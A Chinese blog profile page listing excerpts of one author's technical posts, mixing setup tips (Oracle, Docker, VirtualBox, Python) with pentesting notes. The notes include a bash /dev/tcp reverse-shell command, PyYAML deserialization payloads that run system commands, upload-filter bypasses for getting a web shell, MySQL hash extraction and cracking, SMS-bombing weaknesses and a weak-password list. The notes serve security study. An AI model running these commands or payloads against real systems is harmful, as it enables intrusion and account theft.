5 黑面狐

尚未进行身份认证

好好活着,因为我们会死很久

等级
TA的排名 5k+

oracle官网数据库使用迅雷下载方法

今天要去官网下载一个oracle的数据库,直接使用浏览器下载会一直卡主。直接右键复制链接到迅雷去下载老是下载几KB的不知道什么文件后面网上搜索知道下载的文件时登录后自动生成的。所以想到的解决办法是。登录后点击下载,在复制这个下载url到迅雷中果然下载的url和之前看到的不一样丢到迅雷中下载,这次可以成功下载了...

2019-10-15 10:53:31

Jinja2 Expected an expression, got 'end of print statement'

使用python-doc-Docx-Template报错这个问题一般是语法错误。但是我模板文件有好几十页。使用一个快速的办法定位模板中错误的地方。一段一段的删除运行,进行排除法。最后发现忘了输入变量名导致的还有一个报错genreport.py17Encounteredunknowntag'endfor'.Youprobably...

2019-10-14 10:20:36

web测试中的短信问题

记录一下:网站中手机号已经成为最重要也是最普遍的验证方式了。所以关注短信的问题。1.重置密码/短信验证码登录时验证码回显。直接通过抓包,若验证码直接出现在返回包则直接可以跳过手机验证的阶段。2.验证码没有限制发送频率。利用这个来做短信炸弹,3.发送手机短信验证时不需要输入图片验证码直接发送。直接可以调用接口,可以被人利用做短信轰炸。4.可以控制短信内容。抓包...

2019-08-17 23:57:49

APP安全测试一般关注点

记录一下:一、身份认证安全1、暴力破解账号密码没有设置错误最大尝试次数,没有验证码校验,2、前端校验账号密码修改返回包的返回值测试。3、密码重置安全利用短信验证码回传,验证码暴力破解等二、业务接口调用1.重放攻击短信炸断,自定义短信内容,邮件查单三、业务交易安全窜依篡改金额,负数支付,绕过支付,支付溢出,多线程并发,多重替换支付四、业务授权安全水平越权和垂直越权...

2019-08-11 22:16:03

python bs4标签中含有标签string为空

用bs4解析的时候发现一个问题,标签中含有标签,string属性打印出来的内容为空。如:想要打印出p中的文本内容使用p.string打印结果为None.查询资料:获取tag内容有如下三种方法soup.a.stringsoup.a.textsoup.a.get_text()string方法不能处理标签中含有标签的内容,获取为Nonetext和get_text可以获...

2019-06-30 16:07:14

oracle数据库安装和打补丁的一些坑

今天安装了一下oracle数据库,发现确实很麻烦而且经常出现错误。就稍微简单记录一下错误centos7oracle12.2.0.1自动安装脚本https://github.com/keepwalking86/oracle12copatch没升级导致不能执行,opatch版本下载及psu下载https://blog.csdn.net/huoshuyinhua/article...

2019-06-17 13:42:18

virtualbox虚拟机和宿主机互相访问

要实现宿主机能上网,能和虚拟机相互通信。首先用桥接肯定是能实现的,但是一般网管会限制网络,一个人只能用一个静态ip地址。使用NAT虚拟机能上网,可以ping通宿主机,但是宿主机ping不通虚拟机。解决办法,通过端口转发的方式实现宿主机连接虚拟机。测试virtualbox中安装kali这样就可以ssh连接上去了kali中开启sshvi/etc/ssh/sshd...

2019-05-22 14:02:51

mysql数据库密码破解方法

1.先找到到user.MYD文件。所有的mysql系统用户的账号密码都存在这个文件里。2.编辑器打开这一串hash就是localhost@root的密码,注意破解的时候前面的*不要。3.找个破解的网站破解https://www.cmd5.com/这样忘记了密码都可以通过这样的方式找回,不过如果是比较复杂的密码,是破解不成功的。...

2019-05-08 09:38:50

pocsuite3 写poc

知道创宇的pocsuite3更新了。https://github.com/knownsec/pocsuite3一、安装安装p'ython3.4以上pip3installpocsuite3安装完成后控制台输入pocsuite,如下结果就是安装成功了二、poc测试写一个很简单的poc测试flask的ssti漏洞frompocsuite3.apiim...

2019-04-09 14:29:09

python 代码注入、命令执行函数和方法

一.内置危险函数execexecfileeval二.标准库危险模块ossubprocesscommands三.危险第三方库Template(user_input):模板注入(SSTI)所产生的代码执行subprocess32四.反序列化marshalPyYAMLpickle和cpickleshelvePILunzip...

2019-04-08 13:42:56

后台getshell常用技巧

1.利用文件上传漏洞,找文件上传处想办法上传php文件。一些网站在设置可以允许修改上传的文件类型则直接添加php有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况这种情况直接上传一个.hatccess文件覆盖这个,让其失效。或者上传不重命名的...

2019-04-03 18:02:15

阿里云学生机服务器开启端口

记录一下:今天在我的阿里云学生机上搭建了个mysql,已经设置好远程端口,并且防火墙已经开启3306端口了,但是怎么都连不上。最后查了一下,需要再学生机的控制台里再开启端口才有效果。阿里云功能太多了,我找了好久都没找到我的主机在哪里,后面再别人的解答里发现,学生机属于轻服务器,打开地址:https://swas.console.aliyun.com/?spm=5176.1182...

2019-03-28 21:56:43

cnnvd爬取漏洞信息

这段时间cnnvd的xml文件一直不更新,没办法只能自己去爬取。github上一搜索发现有挺多的类似的项目。scrapy框架编写的脚本https://github.com/luweiwei1111/python_spider/tree/master/scrapy/cnnvd说明:1.本程序用于爬取cnnvd网址的数据,并将数据通过sqlite3数据库保存在cnnvd.db库文件里面,...

2019-03-14 19:07:35

esxi低版本导出的ova导入workstations报错

记录一下。esxi5.1版本导出的ova导入workstations14时报错。首先报错:规范一致性错误这个直接重试就可以了。然后报错Invalidtargetdiskadaptertype:pvscsi这个低版本导入高版本会出错,直接把ova文件解压然后修改ovf文件中的修改为这时ovf的sha1值变化了,网上下载个hash工具重新计算o...

2019-02-28 17:44:43

几种Linux下反弹shell的方法总结

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行nc-lvpport表示显示执行过程监听端口在目标主机上执行bash-i>&/dev/tcp/ip/port0>$1这样就可以在我们的主机上执行命令了 二、n...

2019-02-14 17:42:20

pyyaml反序列化漏洞

pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。测试importyamlyaml.load('!!python/object/apply:os.system["date"]') 结果poc还可以!!python/object/apply:subprocess.check_output[[calc.exe]]!!python/object...

2019-02-14 14:05:38

解决python Markdown模块乱码

有个需求需要把markdown转成html模块,查询了一下刚好有这个模块安装pipinstallamrkdown安装完成直接转换并保存为html时,发现出现中文乱码的情况用编辑器打开发现是缺少utf8编码所以只需要在头增加一行<metahttp-equiv="Content-Type"content="text/html;charset=utf-8"/&...

2019-01-22 18:32:00

docker ubuntu REST API

最近需要使用dockerapi。简单记录一下一、安装配置测试机器:ubuntu16.04配置文件路径查询systemctlshow--property=FragmentPathdocker 配置文件sudovim /lib/systemd/system/docker.service ExecStart=/usr/bin/dockerd-Hunix:///v...

2019-01-15 17:09:50

docker Starting MySQL database server mysqld fail解决办法

今天有一个ubuntu+mysql的测试环境,在容器重启的时候mysql启动失败,导致docker启动失败。首先查看docker日志dockerlogs8a16发现有如下报错: *StoppingMySQLdatabaseservermysqld  ...done. *StartingMySQLdatabaseservermysqld  .....

2018-12-18 18:28:27

2018弱密码TOP 100

MARK:留着爆破测试弱口令使用123456password12345678912345678123451111111234567sunshineqwertyiloveyouprincessadminwelcome666666abc123football123123monkey654321!@#$%^&*charlieaa123456do...

2018-12-17 13:24:15

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。